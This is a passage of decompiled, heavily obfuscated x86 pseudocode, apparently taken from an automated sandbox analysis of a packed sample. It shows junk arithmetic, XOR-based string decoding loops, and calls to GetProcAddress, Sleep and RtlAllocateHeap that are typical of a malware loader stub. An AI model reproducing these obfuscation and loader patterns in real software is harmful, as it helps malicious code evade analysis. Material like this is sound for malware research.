								__eflags =  *0x1000c9c - _t2287;
								__eflags = (0 |  *0x1000c9c == _t2287) - _t1475;
								if(__eflags == 0) {
									asm("sbb ecx, ecx");
									_v10 = _v12 & 0 | __eflags == 0x00000000;
									_t2996 =  *0x1000d08 * 0x4cbe9a17;
									__eflags = _t2996;
									 *0x1000cd2 = _v60 - 0x14;
									 *0x1000c84 = _t2996;
									_v48 =  *0x1000ca0;
								}
							}
						} else {
							_t2997 = "d:\\th\\ds\\ext\\a"; // 0x745c3a64
							_t1577 = "h\\ds\\ext\\a"; // 0x73645c68
							_t2431 = "\\ext\\a"; // 0x7478655c
							_v376 = _t2997;
							_t2998 =  *0xfff31c; // 0x615c
							_v372 = _t1577;
							_t1578 =  *0xfff31e; // 0x0
							_v368 = _t2431;
							_v364 = _t2998;
							_v362 = _t1578;
							_v361 = _t2287;
						}
						_t1300 = _t3546 - 0xf0; // 0x56
						 *(_t3601 + _t3546 * 2 - 0x190) = ( *(_t3601 + _t1300) ^ 0x0000001b) & 0x000000ff;
						_t3546 = _t3546 + 1;
						__eflags = _t3546 - 0xc;
					} while (_t3546 < 0xc);
					_t1476 =  *0x1000c88; // 0xa666078f
					__eflags = _t1476 -  *0x1000ca8; // 0x7b8b5249
					if(__eflags == 0) {
						_t2419 =  *0x1000c8c; // 0xfff500a5
						__eflags = _t2419 -  *0x1000cac; // 0x106b42
						if(__eflags == 0) {
							_t3052 =  *0x1000cf4; // 0x2b91c
							_t1560 =  *0x1000cf0; // 0xd43579fe
							_t1561 = E00ECEE50(_t1560, _t3052, 2, _t2287);
							_t2420 = M01000CB0; // 0x0
							asm("sbb edx, esi");
							 *0x1000cf0 = _t1561 - _t2420;
							 *0x1000cf4 = _t3052;
							_v132 = _v15 & 0x000000ff ^ _v132 & 0x0000ffff;
							_v44 = _v44 -  *0x1000d10 - _v44;
							_t1569 =  *0x1000c9c +  *0x1000c9c;
							__eflags = _t1569;
							_v12 = _v112 - 0x80;
							_v10 = _t1569;
						}
					}
					_t1477 =  *0x1000cc0; // 0xffff970a
					_t3000 =  *0x1000ca8; // 0x7b8b5249
					_v380 = _v312 * _v308 ^ 0x0000b7f8;
					_v112 = 0x5b39;
					_v40 = _t1477 * 0x1e80;
					_v112 =  *0x1215420;
					_v144 = _t3000 + 0x7606;
					_t3002 = _v6;
					 *0x1000c94 = _v13 - 0x74bb;
					_t3547 = _v72;
					asm("cdq");
					_v232 = 0x80;
					_v231 = 0x88;
					_v230 = 0x80;
					_v229 = 0x82;
					_v228 = 0x9f;
					_v227 = 0x94;
					__eflags = _t3002 - _v76;
					if(_t3002 != _v76) {
						L479:
						_t1481 = 1;
					} else {
						__eflags = _t3002 - _t3547;
						if(_t3002 == _t3547) {
							_t1481 = 0;
							__eflags = 0;
						} else {
							goto L479;
						}
					}
					_t3548 =  *0x1000cb8; // 0x4
					__eflags = _v6 - 0x64;
					_t3004 = 0 | _v6 != 0x00000064;
					__eflags = _t1481 - _t3004;
					if(_t1481 == _t3004) {
						_t1556 =  *0x1000c88; // 0xa666078f
						_t3004 =  *0x1000c8c; // 0xfff500a5
						 *0x1000cd8 = E00FFD310(_t1556, 7, _t3004);
						_t1558 =  *0x1000c90; // 0xffff571c
						asm("cdq");
						_t2418 = _t3548 - _t1558;
						__eflags = _t2418;
						_t1559 =  *0x1000cbc; // 0x0
						asm("sbb eax, edx");
						_v68 = _t2418;
						_v64 = _t1559;
					}
					M01000CB0 = _t3548 * 0xfd8bdd23;
					_t3514 = 0;
					__eflags = 0;
					do {
						_t1483 = E00EC1700();
						asm("cdq");
						 *0x1000cc8 = _t1483;
						__eflags = _t1483 | _t3004;
						 *0x1000ccc = _t3004;
						if((_t1483 | _t3004) != 0) {
							__eflags = _v108 | _v104;
							if((_v108 | _v104) != 0) {
								_t1487 = 0;
								__eflags = 0;
							} else {
								_t1487 = 1;
							}
							_t3007 = (_v9 & 0x000000ff) * _v44 * _t1487;
							__eflags = _t3007;
							_v92 = _t3007;
							_v88 = _t2287;
						} else {
							__eflags = _v68 | _v64;
							if((_v68 | _v64) != 0) {
								_t1547 = 0;
								__eflags = 0;
							} else {
								_t1547 = 1;
							}
							_t3047 = (_t1547 << 4) - _t1547;
							__eflags = _t3047;
							if(_t3047 != 0) {
								L496:
								_t1548 = 1;
							} else {
								__eflags = _v28;
								if(_v28 != 0) {
									goto L496;
								} else {
									_t3050 =  *0x1000ca0; // 0x5247
									asm("adc eax, [0x1000ce4]");
									_t3553 = M01000CB0; // 0x0
									_t3554 = _t3553 + _t3050;
									_t2415 =  !(_v92 +  *0x1000ce0);
									__eflags = 0 -  !_v88;
									if(__eflags < 0) {
										goto L496;
									} else {
										if(__eflags > 0) {
											L495:
											_t1548 = 0;
										} else {
											__eflags = _t3554 - _t2415;
											if(_t3554 <= _t2415) {
												goto L496;
											} else {
												goto L495;
											}
										}
									}
								}
							}
							__eflags =  !_t1548;
							if( !_t1548 != 0) {
								_v32 = (_v32 & 0x0000ffff) - (_v32 & 0x0000ffff) + _v80;
								 *0x1000c9b =  *0x1215420;
							}
						}
						_t3004 =  *(_t3601 + _t3514 - 0xe4) ^ 0x000000cd;
						 *(_t3601 + _t3514 * 2 - 0x148) = _t3004 & 0x000000ff;
						_t3514 = _t3514 + 1;
						__eflags = _t3514 - 6;
					} while (_t3514 < 6);
					 *0x1000cd0 =  *0x1000cd0 + 1;
					_v80 = 2;
					_v40 =  *0x1000c9a - 0x57;
					 *0x1000ca0 =  *0x1000ca0 & _v140 + 0x7d5b2049;
					_t1490 = _v80 - _t2287;
					__eflags = _t1490;
					if(_t1490 == 0) {
						_v60 = _v19 - 0x399b134;
						_v56 = _t2287;
						 *0x1000d00 =  *0x1000c88;
						 *0x1000d04 =  *0x1000c8c;
						_t3014 = _v108 + _v68;
						asm("adc eax, esi");
						_t1494 = E00ECEE50(E00ECEE50(_t3014, _v104,  *0x1000d18,  *0x1000d1c), _t3014, 2, _t2287);
						__eflags = _t1494 | _t3014;
						if((_t1494 | _t3014) != 0) {
							_t1496 = 0;
							__eflags = 0;
						} else {
							_t1496 = 1;
						}
						_v10 =  *0x1000ce0 |  *0x1000ce4;
						 *0x1000cf8 =  !(_v44 +  *0x1000cb4 + ((0 | _v10 == 0x00000000) +  *0x1000c9e & 0x0000ffff)) * _t1496;
						if(( *0x1000ce0 |  *0x1000ce4) != 0) {
							_t1499 = 0;
							__eflags = 0;
						} else {
							_t1499 = 1;
						}
						asm("sbb edx, edx");
						_t3025 =  ~((_v16 & 0x000000ff) + _t1499) + 1;
						_t1501 =  *0x1000cd0 * 0xda;
						__eflags = _t1501;
						M01000CB0 = _t3025;
						asm("cdq");
						_v92 = _t1501;
						_v88 = _t3025;
					} else {
						_t1540 = _t1490 - 1;
						__eflags = _t1540;
						if(_t1540 == 0) {
							 *0x1000c9b =  *0x1000d00;
						} else {
							__eflags = _t1540 == 1;
							if(_t1540 == 1) {
								 *0x1000ca0 = 0x737;
								_v18 =  !((_v96 & 0x0000ffff) * ( *0x1000c9e + 1) + (_v48 & 0x0000ffff));
							}
						}
					}
					_t3027 = 0x7bff - (_v316 ^ 0x0000030e | _v188 * 0x000000a9);
					_v320 = _t3027;
					_t1506 = E00EC1190();
					asm("cdq");
					 *0x1000d04 = _t3027;
					 *0x1000d00 = _t1506 & 0x000000ff;
					__eflags = _v13;
					if(_v13 != 0) {
						L520:
						_t3029 = _v132;
						asm("cdq");
						__eflags = (_t3029 & 0x0000ffff) -  *0x1000c88;
						if((_t3029 & 0x0000ffff) !=  *0x1000c88) {
							L523:
							__eflags = _v132;
							if(_v132 == 0) {
								asm("sbb eax, eax");
								__eflags =  ~_v80 + 1 - _v148;
								_t1403 =  ~_v80 + 1 == _v148;
								__eflags = _t1403;
								if(_t1403 == 0) {
									__eflags =  *0x1000ca4 - _v40;
									if( *0x1000ca4 >= _v40) {
										asm("cdq");
										asm("sbb esi, edx");
										__eflags = _v164 -  *0x1000c9c | _v160;
										if((_v164 -  *0x1000c9c | _v160) != 0) {
											 *0x1000ca4 = ((_v18 & 0x000000ff) -  *0x1000cdc) * ((_v19 & 0x000000ff) +  !( *0x1000cdc) - (_v16 & 0xff)) * ((_v13 & 0x000000ff) +  *0x1000c90);
											asm("cdq");
											_v92 = _v92 + ( *0x1000c98 & 0x0000ffff);
											asm("adc [ebp-0x54], edx");
											_t2399 = _v18 & 0x000000ff ^ 0x000000fe;
											__eflags = _t2399;
											_v12 = _t2399;
										}
									}
								} else {
									 *0x1000c9a =  !( *0x1000c83);
									 *0x1000c9b = _v128 + 0x30;
								}
							}
						} else {
							__eflags = _t3029 -  *0x1000c8c;
							if(_t3029 !=  *0x1000c8c) {
								goto L523;
							} else {
								_v5 =  *0x1000cd0;
								_v96 = (_v12 & 0x000000ff) + (_v12 & 0x000000ff) * 4 << 4;
								_v9 = _v80 & 0x000000ea;
							}
						}
					} else {
						__eflags =  !_v112;
						if( !_v112 != 0) {
							goto L520;
						} else {
							(_v12 & 0xff) - ( !(_v15 & 0x000000ff) | _v7 & 0xff) =  !((_v12 & 0xff) - ( !(_v15 & 0x000000ff) | _v7 & 0xff) < 0);
							if( !((_v12 & 0xff) - ( !(_v15 & 0x000000ff) | _v7 & 0xff) < 0) != 0) {
								_t2406 =  *0x1000c9e; // 0x0
								_v17 = _t2406 - 0x5b;
							}
						}
					}
					_t3030 =  &_v332;
					_t1509 =  &_v404;
					goto L530;
				} else {
					_t3059 =  *0x1000cdc; // 0x84521e70
					 *0x1000cb4 = _t3059 + 0xca6a8024;
					_t3062 = _t1469 * 0x7c >> 0x20;
					 *0x1000c9f = _t1469 * 0x7c;
					asm("cdq");
					asm("adc edx, edi");
					_v60 = E00ECEE50((_v12 & 0x000000ff) + _v60, _t3062, _v60, _v56);
					_v56 = _t3062;
					_t2442 =  *0x1000ce8; // 0x4
					_v76 = _v68 ^ 0xe39f933a;
					_v72 = _v64 ^ 0x0001ddff;
					_v14 = _t2442 >> 7;
					_v36 =  *0x1215420;
					 *0x1000d10 = 0x1a;
					 *0x1000d14 = _t2286;
					_v8 = ((_v8 & 0x000000ff) - (_v28 & 0x0000ffff)) * (_v8 & 0x000000ff);
					 *0x1000cd4 =  *0x1000cd4 + _v48 * 0xff8d;
					_v44 = _v44 *  *0x1000cb4;
					_v108 =  *0x1215420;
					_v104 = _t2286;
					_t3069 =  *0x1000d10; // 0x0
					_v188 = _v36 + 0x2ce;
					GetProcAddress(_t3069, "GetLastError");
					_v184 = _v36 + 0x11e;
					asm("cdq");
					_v76 =  *0x1000c9e;
					_v72 = _t3069;
					_v13 = (_v13 & 0x000000ff) + (_v6 & 0x000000ff);
					 *0x1000c9f = 0xc8;
					_v7 =  *0x1215420 & 0x000000ff;
					_v176 = _v36 + 0x30d;
					if(_v176 * _v184 == 0xfffffff8) {
						L531:
						__eflags = 0;
						return 0;
					} else {
						_t3709 =  *0x1000c9c - _t2286; // 0xd4
						if(_t3709 != 0) {
							 *0x1000c83 = 3;
							_t1884 =  *0x1000c83 & 0x000000ff;
							_v140 = _v112;
							if(_t1884 <= 3) {
								switch( *((intOrPtr*)(_t1884 * 4 +  &M00EC78AC))) {
									case 0:
										 *0x1000d18 = _t2286;
										 *0x1000d1c = _t2286;
										_v112 = (_v15 & 0x000000ff ^ _v92) + ( *0x1000c9b & 0x000000ff) - _v52;
										_v17 = (_v7 & 0x000000ff) + 0xd0;
										goto L269;
									case 1:
										__ecx = _v100 & 0x0000ffff;
										__edx =  *0x1000c9c; // 0x250000d4
										__ecx = (_v100 & 0x0000ffff) - __edx;
										_v100 = __cx;
										goto L269;
									case 2:
										 *0x1000d10 = 0xbe;
										 *0x1000d14 = __ebx;
										goto L269;
									case 3:
										__eax =  *0x112f775;
										asm("cdq");
										 *0x1000cc8 =  *0x112f775;
										__eax = _v11 & 0x000000ff;
										__ecx =  *0x1000d08; // 0xd72e
										 *0x1000ccc = __edx;
										_t854 = __ecx - 0x632d50be; // -1663913950
										__edx = (_v11 & 0x000000ff) + _t854;
										_v11 = __dl;
										__eax = _v7 & 0x000000ff;
										__ecx =  *0x1000c9a;
										__edx = _v7 & 0x000000ff;
										__eax = (_v7 & 0x000000ff) *  *0x1000c9a;
										__edx = _v7 & 0x000000ff | (_v7 & 0x000000ff) *  *0x1000c9a;
										_v7 = __dl;
										__eax = _v164;
										__ecx = _v160;
										__eax = _v164 - 0x13;
										__eflags = __eax;
										 *0x1000cdc = __eax;
										goto L269;
								}
							}
						}
						L269:
						Sleep(0xfa); // executed
						_t1603 = RtlAllocateHeap(_t3545, 8, 0x12e3a0); // executed
						_t3073 = _v11;
						 *0x10bbe8c = _t1603;
						if(_t3073 >  *0x1000cdc) {
							__eflags = _v100;
							if(__eflags != 0) {
								asm("cdq");
								asm("adc edx, esi");
								asm("adc edx, esi");
								_t1874 = _v100 + _v140 + _v108 | _t3073;
								__eflags = _t1874;
								if(_t1874 != 0) {
									_t2634 = 0;
									__eflags = 0;
								} else {
									_t2634 = _t1874 + 1;
								}
								__eflags =  *0x1000cd0; // 0x0
								asm("cdq");
								asm("cdq");
								asm("sbb edi, edx");
								asm("adc esi, edi");
								_t2636 = _t2634 + (0 | __eflags == 0x00000000) - 0x38 -  !( *0x1000cec & 0x0000ffff) - _v76;
								asm("sbb esi, eax");
								__eflags = M01000CB0;
								 *0x1000cc0 =  !_t2636;
								 *0x1000cc4 =  !0x00000000;
								if(M01000CB0 != 0) {
									_t1881 = 0;
									__eflags = 0;
									_v192 = 0;
								} else {
									_t1881 = 1;
									_v192 = 0;
								}
								_t3247 =  *0x1000c84; // 0x52f68420
								_t2638 =  *0x1000cb4; // 0x51
								 *0x1000c9e = _t2638 - (_t1881 |  *0x1000d10);
								 *0x1000d08 = (_v28 ^ 0x00000082) * ( !(_t3247 *  *0x1000d00) & 0x0000ffff);
								_t2286 = 0;
								__eflags = 0;
							}
						} else {
							 *0x1000ca0 = _v32 + 0x30;
						}
						_t2452 = _v200;
						if(_v200 * 0xfffc7d5b == (_v172 | _v200 | 0x0000023d)) {
							goto L531;
						} else {
							_t3713 = _v108 | _v104;
							if((_v108 | _v104) != 0) {
							}
							_t1611 = E00EC8E37(_t2452, _t3713, 0x64, 0x2d); // executed
							_v124 = _t1611;
							_v120 = _t2286;
							_t1612 = _v124;
							if(_v120 > _t2286 || _t1612 > _t2286) {
								_t2453 = 1;
							} else {
								_t2453 = 0;
								__eflags = 0;
							}
							_t1613 = _v124;
							if(_v120 > _t2286 || _t1613 > 0x56) {
								_t1614 = 1;
							} else {
								_t1614 = 0;
								__eflags = 0;
							}
							if(_t2453 != _t1614) {
								__eflags = _v44;
								if(_v44 == 0) {
									L298:
									__eflags =  *0x1000cd2;
									if(__eflags == 0) {
										__eflags = _v40;
										if(__eflags == 0) {
											_t2619 =  *0x1000d10; // 0x0
											_t1862 =  *0x1000cf8; // 0xffff
											_v80 = _t2619 + 0x5f35bf84;
											_t2621 =  *0x1000cc8; // 0x1
											 *0x1000cd0 =  *0x1000cd0 + _t2621 * 0x75df;
											 *0x1000c9c =  *0x1000c9e * 0x307c;
											_t3237 = (_t1862 << 4) + _t1862;
											__eflags = _t3237;
											 *0x1000ca8 = 0xe0dd;
											 *0x1000cac = _t2286;
											 *0x1000cf8 = _t3237;
										}
									} else {
										_v7 = _v7 | _v7 +  *0x1000ce0;
										 *0x1000ca4 =  ~(_v9 & 0xff);
										_t2625 =  *0x1000cd4; // 0x0
										 *0x1000c9b = (_v13 & 0x000000ff) - 0x27;
										_v7 = (_v7 & 0x000000ff) - _t2625;
										 *0x1000c9e =  *0x1215420 & 0x000000ff;
									}
								} else {
									__eflags = _v11;
									if(__eflags == 0) {
										goto L298;
									} else {
										_t3241 =  *0x1000c90; // 0xffff571c
										 *0x1000c94 = _t3241;
									}
								}
							} else {
								_t3719 =  *0x1000d20 -  *0x1000c9a; // 0x530e
								if(_t3719 == 0) {
									__eflags = _v8 - _v40;
									if(__eflags != 0) {
										_t2629 =  *0x1000d00; // 0xfffff835
										_t3243 =  *0x1000d04; // 0xffffffff
										asm("adc edx, ebx");
										M01000CB0 = 0x396ae7eb;
										_v16 = 0x3e;
										 *0x1000cc8 = _t2629 + 0x1afd0521;
										 *0x1000ccc = _t3243;
									}
								} else {
									 *0x1000ca4 = ( *0x1000c9b & 0x000000ff) - 0x313bc7a3;
									_v8 =  *0x1215420;
								}
							}
							if( *0x10bbe8c == _t2286) {
								_v16 = E00EC1370(__eflags);
								__eflags = _v16;
								if(_v16 > 0) {
									 *0x1000cf8 = 0x8d03;
								}
								_t3077 =  *0x1215420;
								_v36 = _t3077;
								__eflags =  *0x1000c9b;
								_v184 = _v36 + 0x276;
								if( *0x1000c9b != 0) {
									L328:
									__eflags = _v16 - _v9;
									if(_v16 <= _v9) {
										_t2455 = 0;
										__eflags = 0;
									} else {
										_t2455 = 1;
									}
									asm("cdq");
									asm("adc edx, [0x1000d14]");
									__eflags = ( *0x1000c98 & 0x0000ffff) +  *0x1000d10 - _t2455;
									if(( *0x1000c98 & 0x0000ffff) +  *0x1000d10 != _t2455) {
										L334:
										_t1624 = 0;
										__eflags = 0;
									} else {
										__eflags = _t3077;
										if(_t3077 != 0) {
											goto L334;
										} else {
											_t1624 = 1;
										}
									}
									__eflags =  *0x1000cf8 - _t2286;
									_v172 = _t2286;
									_t2457 = 0 |  *0x1000cf8 == _t2286;
									__eflags = _t2457 - _v44;
									asm("sbb ecx, ecx");
									(_v7 & 0x000000ff) - _t2457 + 1 = _t1624 - (_v7 & 0x000000ff) - _t2457 + 1 < 0;
									_t2286 = _v172;
									if(_t1624 != (_v7 & 0x000000ff) - _t2457 + 1 < 0) {
										__eflags = _v144;
										_t3083 = _v144 - (0 | _v144 == 0x00000000);
										__eflags = _t3083;
										if(_t3083 != 0) {
											 *0x1000ca0 =  *0x1215420;
											asm("cdq");
											 *0x1000cbc = _t3083;
											_t3083 =  *0x1000ce8;
											_t2598 = (_v18 & 0x000000ff) * _t3083;
											__eflags = _t2598;
											 *0x1000cb8 =  *0x1000c9a - 0x20f4;
											_v18 = _t2598;
										}
									} else {
										_v28 =  *0x1000ca4 - (_v15 & 0xff);
										asm("cdq");
										 *0x1000cf0 =  *0x1000cf0 - (_v13 & 0x000000ff);
										asm("sbb [0x1000cf4], edx");
										_t3083 = _v104;
										 *0x1000c94 = _v108 + 0xbfc4;
										_v112 = (_v14 & 0xff) * 0x9564;
									}
								} else {
									__eflags = ( *0x1000c83 & 0x000000ff) - _v148;
									if(( *0x1000c83 & 0x000000ff) > _v148) {
										goto L328;
									} else {
										_v44 =  *0x1000cd2 + 0xd71b;
										_v40 = _v40 - 1;
										_v15 = (_v15 & 0x000000ff) +  *0x1000c9e - (_v15 & 0xff);
										_t3083 = (_v9 & 0x000000ff) + (_v9 & 0x000000ff &  *0x1000cd8);
										_v9 = _t3083;
									}
								}
								_v176 = _v36 + 0x2e4;
								_t1629 = _v5;
								asm("cdq");
								__eflags = _t1629 -  *0x1000d10; // 0x0
								if(__eflags != 0) {
									L341:
									_t1630 = 1;
								} else {
									__eflags = _t3083 -  *0x1000d14; // 0x0
									if(__eflags == 0) {
										_t1630 = 0;
										__eflags = 0;
									} else {
										goto L341;
									}
								}
								_t3084 = _v5;
								_t3084 - 0x30 = _t1630 - (_t3084 != 0x30);
								if(_t1630 > (_t3084 != 0x30)) {
									asm("cdq");
									asm("sbb esi, edx");
									asm("cdq");
									__eflags =  *0x1000d10 - (_v28 & 0x0000ffff) |  *0x1000c84 |  *0x1000d14 | _t3084;
									if(( *0x1000d10 - (_v28 & 0x0000ffff) |  *0x1000c84 |  *0x1000d14 | _t3084) != 0) {
										_v32 = _v60 * _v32;
										_v44 = 0x3090bb2d;
										_t3213 = _v5 + 0x23;
										__eflags = _t3213;
										 *0x1000c9a = _t3213;
										_v68 = E00ECEE50(_v60, _v56, 0x7d, _t2286);
										_v64 = _t3213;
									}
								} else {
									 *0x1000c9f = TlsGetValue(_v100);
								}
								_v188 = _v36 + 0x2bc;
								_v36 =  *0x1215420;
								 *0x1000cd0 = 0xfffff41d;
								 *0x1000cd8 = (1 -  *0x1000d18) *  *0x1000cd8;
								_t1635 =  *0x1000cb8; // 0x4
								 *0x1000c94 = _v60 * 0xdcf2d26f;
								_v148 = _t1635 & 0x00000006;
								_v24 = _v36 + 0x3b1;
								__eflags = _v128;
								if(_v128 == 0) {
									__eflags =  *0x1000ca8 |  *0x1000cac;
									if(( *0x1000ca8 |  *0x1000cac) != 0) {
										__eflags =  !( *0x1000d10) |  !( *0x1000d14);
										if(( !( *0x1000d10) |  !( *0x1000d14)) != 0) {
											 *0x1000ca4 =  *0x1000ca4 - 1;
											asm("adc ecx, [0x1000cbc]");
											_v60 = _v60 +  *0x1000cb8 + 0xd0056b0c;
											asm("adc ecx, 0xfff005d1");
											asm("adc eax, 0xfff765fd");
											 *0x1000ce4 =  *0x1000d04;
											 *0x1000ce0 =  *0x1000d00 + 0x1e29880a;
											asm("cdq");
											_v60 = _v60 - _v5 + 0x10;
											asm("sbb [ebp-0x34], edx");
											_t2582 = (_v164 + _v28 + 2) * 0x6a +  *0x1000c98 * 0x41;
											__eflags = _t2582;
											 *0x1000c83 = _t2582;
										}
									} else {
										 *0x1000ca4 = (_v108 +  *0x1000ca4) *  *0x1000ca4;
										_v52 = _v52 - _v68;
										_v40 =  *0x1000c84 + 0x6491;
									}
								} else {
									__eflags = _v112;
									if(_v112 != 0) {
										_t1809 =  *0x1000ce0; // 0x0
										_t2585 =  *0x1000ce4; // 0x0
										__eflags = _t1809 ^  *0x1000d18 | _t2585 ^  *0x1000d1c;
										if(__eflags == 0) {
											 *0x1000c84 = 0x78;
											 *0x1000cc8 =  *0x1000ca8 & 0x430b161a;
											 *0x1000ccc = _t2286;
											_v7 =  *0x1215420;
											_v116 =  *0x1000cb4 << 4;
										} else {
											 *0x1000c88 =  *0x1000c9f + 0x60ad17c2 ^  *0x1000c94;
											_t2594 =  *0x1000c9c; // -44
											 *0x1000c8c = _t2286;
											_v8 = _v17 & 0xffffff00 | __eflags == 0x00000000;
											_v80 = ( *0x1000c98 & 0x0000ffff) + 0x73bfbdfe;
											 *0x113d808 = _t2594;
										}
									}
								}
								_v168 = _v36 + 0x241;
								_v200 = _v36 + 0x273;
								_v36 =  *0x1215420;
								_v10 = E00EC1000();
								__eflags = 0x4f - (_v10 & 0x000000ff);
								_t3096 = _v10 & 0x000000ff;
								asm("sbb ecx, ecx");
								__eflags = 0 - _t3096;
								asm("sbb edx, edx");
								__eflags = _t3096 + 1 - _v8 + 1;
								if(_t3096 + 1 > _v8 + 1) {
									asm("cdq");
									 *0x1000ce0 =  *0x1000ce0;
									asm("sbb [0x1000ce4], edx");
									_v28 = _v116 - 0x23c803e3;
									_v44 =  *0x1215420;
									 *0x1000cd2 = 0 - (_v164 ^ 0);
									_t2577 = (_v12 & 0xff) + _v112 + 1;
									__eflags = _t2577;
									 *0x1000cd8 = _t2577;
								}
								_v172 = _v36 + 0x83;
								__eflags = _v164 | _v160;
								if(__eflags == 0) {
									asm("sbb eax, eax");
									asm("cdq");
									_t3099 = _v52 & 0x0000ffff;
									asm("cdq");
									asm("sbb edx, ebx");
									 *0x1000d18 = E00ECEE50(( ~_v44 + 1) * (_v32 & 0x0000ffff), _v32 & 0x0000ffff, _t3099 - _v76, _t3099);
									 *0x1000d1c = _t3099;
									 *0x1000cd8 = ( *0x1000c9b & 0x000000ff) - 0x23e5;
									_t2286 = 0;
									__eflags = 0;
								} else {
									_v80 = E00EC1370(__eflags) & 0x000000ff;
									_t3183 = _v80;
									__eflags = _t3183;
									if(_t3183 <= 0) {
										_t1776 =  *0x1000cac; // 0x106b42
										__eflags = _t1776 -  *0x1000c8c; // 0xfff500a5
										if(__eflags > 0) {
											L364:
											_t1778 = _v14 & 0x000000ff;
											asm("cdq");
											__eflags = _t3183 -  *0x1000d14;
											if(__eflags < 0) {
												L368:
												_t1779 = 0;
												__eflags = 0;
											} else {
												if(__eflags > 0) {
													L367:
													_t1779 = 1;
												} else {
													__eflags = _t1778 -  *0x1000d10;
													if(_t1778 <=  *0x1000d10) {
														goto L368;
													} else {
														goto L367;
													}
												}
											}
											_v12 =  *0x1000c90 - (_v12 == 0);
											__eflags = _t1779 - ( *0x1000c90 == _v12 == 0);
											if(_t1779 <= ( *0x1000c90 == _v12 == 0)) {
												_t3186 =  *0x1215420;
												_v132 = _t3186;
												asm("cdq");
												asm("cdq");
												_t1785 = E00ECEE50(E00ECEE50(_v40, _t3186, ( *0x1000cd4 & 0x0000ffff) + 0x43, _t3186), _t3186,  *0x1000d18,  *0x1000d1c);
												 *0x1000ce4 = _t3186;
												 *0x1000ce0 = _t1785;
												_v140 = ((_v7 & 0x000000ff) - (_v10 & 0x000000ff)) *  *0x1000d18;
												_v48 = (_v136 & 0x0000ffff) - 0x86;
											}
										} else {
											if(__eflags < 0) {
												L363:
												_v6 = _v132 - 0x6b;
											} else {
												_t2570 =  *0x1000ca8; // 0x7b8b5249
												__eflags = _t2570 -  *0x1000c88; // 0xa666078f
												if(__eflags > 0) {
													goto L364;
												} else {
													goto L363;
												}
											}
										}
									}
								}
								_t3101 = _v36 + 0x373;
								_v188 = _t3101;
								_t3561 = _v92;
								_t1660 = _v52;
								asm("cdq");
								__eflags = _t3101 - _v88;
								if(__eflags > 0) {
									L376:
									_t1661 = 0;
									__eflags = 0;
								} else {
									if(__eflags < 0) {
										L375:
										_t1661 = 1;
									} else {
										__eflags = _t1660 - _t3561;
										if(_t1660 > _t3561) {
											goto L376;
										} else {
											goto L375;
										}
									}
								}
								__eflags = _v52 - 0x54;
								_t3103 = 0 | _v52 - 0x00000054 <= 0x00000000;
								__eflags = _t1661 - _t3103;
								if(_t1661 < _t3103) {
									_v13 =  *0x1000cd0;
									 *0x1000ca4 =  *0x1000cb4;
								} else {
									asm("cdq");
									_v76 = _v76 - E00ECEE50(_v76, _v72,  *0x1000c9c, _t3103);
									asm("sbb [ebp-0x44], edx");
									_v16 = 0x53;
									_t3182 = _v40;
									_t1774 = _t3182 - 0xff34;
									__eflags = _t1774;
									asm("cdq");
									 *0x1000cc0 = _t1774;
									asm("ror byte [eax+eax], 0x1");
									 *0x1000cc4 = _t3182;
								}
								_t3105 = _v36 + 0x117;
								_v188 = _t3105;
								 *0x1000ca4 = E00EC1700();
								asm("cdq");
								asm("adc edx, 0xcae43");
								__eflags =  !( *0x1000c9f) + 0x0dc8da25 | _t3105;
								if(( !( *0x1000c9f) + 0x0dc8da25 | _t3105) != 0) {
								}
								__eflags = _v172 - 0x3b0;
								if(_v172 != 0x3b0) {
									_v112 = _v112 &  *0x1109ef0;
									_v140 = _v140 - _v124 & _v140;
									_v256 = 0x97;
									_v255 = 0xaf;
									_v254 = 0xb7;
									_v253 = 0xb9;
									_v252 = 0xbc;
									_v251 = 0xc3;
									_v250 = 0x6a;
									_v249 = 0xb0;
									_v248 = 0xab;
									_v247 = 0xbf;
									_v246 = 0xb6;
									_v245 = 0xbe;
									_t3562 = 0;
									do {
										_t2487 =  *0x1000cc0; // 0xffff970a
										__eflags = _t2487 |  *0x1000cc4;
										if((_t2487 |  *0x1000cc4) == 0) {
											_t3110 = _v11;
											_t1671 = _t3110;
											asm("cdq");
											__eflags =  *0x1000cbc - _t3110;
											if(__eflags < 0) {
												L393:
												_t1672 = 0;
												__eflags = 0;
											} else {
												if(__eflags > 0) {
													L392:
													_t1672 = 1;
												} else {
													__eflags =  *0x1000cb8 - _t1671;
													if( *0x1000cb8 <= _t1671) {
														goto L393;
													} else {
														goto L392;
													}
												}
											}
											__eflags =  !_t1672;
											if( !_t1672 == 0) {
												__eflags =  *0x1000ce0 |  *0x1000ce4;
												if(( *0x1000ce0 |  *0x1000ce4) != 0) {
													_t3179 = _v116 &  *0x1000ce0;
													 *0x1000ce0 = E00ECEE50(_t3179, 0 &  *0x1000ce4,  *0x1000ce0,  *0x1000ce4);
													 *0x1000ce4 = _t3179;
													 *0x1000cd8 = _v68 * 0xffffe4ed;
													_t1770 =  *0x1000d20 & 0xffffb755;
													__eflags = _t1770;
													_v96 = _t1770;
												}
											} else {
												 *0x1000c84 =  *0x1000c84 + 1;
											}
										} else {
											 *0x1000c84 = 0x9b;
											_v12 = 1;
										}
										_t3111 =  *0x1000d08;
										_t2491 =  *0x1000cf4; // 0x2b91c
										asm("cdq");
										_t3112 =  *0x1000cf0; // 0xd43579fe
										_v172 = _t3111;
										_t1680 = E00ECEE50(_t3112, _t2491, 0x1faed387, _t2286);
										asm("sbb edx, edi");
										_t2286 = 0;
										__eflags = _t1680 -  !(_v6 ^ _t3111) | _t3112;
										 *0x1000cf4 = 0;
										 *0x1000cf0 = 1;
										if((_t1680 -  !(_v6 ^ _t3111) | _t3112) != 0) {
											 *0x1000cf0 = 0;
										}
										_t2493 =  *0x1000ca4; // 0x9b27
										 *0x1000c90 = 0xb8f675f1 - (_v5 & 0x000000ff);
										_t3115 =  *0x1000cdc; // 0x84521e70
										__eflags = _v40 & 0x0000ffff;
										_t3562 = _t3562 + 1;
										 *0x1000d10 = (_v5 & 0x000000ff) * _v112 * ( *0x1000d08 - (0 | (_v40 & 0x0000ffff) == 0x00000000)) * ((( *0x1000c83 & 0x000000ff) + 1) *  *0x1000cb4 +  !(_t2493 + _t3115));
										__eflags = _t3562 - 0xc;
										 *(_t3601 + _t3562 * 2 - 0x1ae) = ( *(_t3601 + _t3562 - 0xfd) & 0x000000ff) - 0x0000004a & 0x000000ff;
										 *0x1000d14 = _t2286;
									} while (_t3562 < 0xc);
									_t3123 = 0x92 - (_v176 ^ _v184);
									_t1692 = M01000CB0; // 0x0
									_v408 = _t3123;
									 *0x1000cc0 = 2;
									 *0x1000cc4 = _t2286;
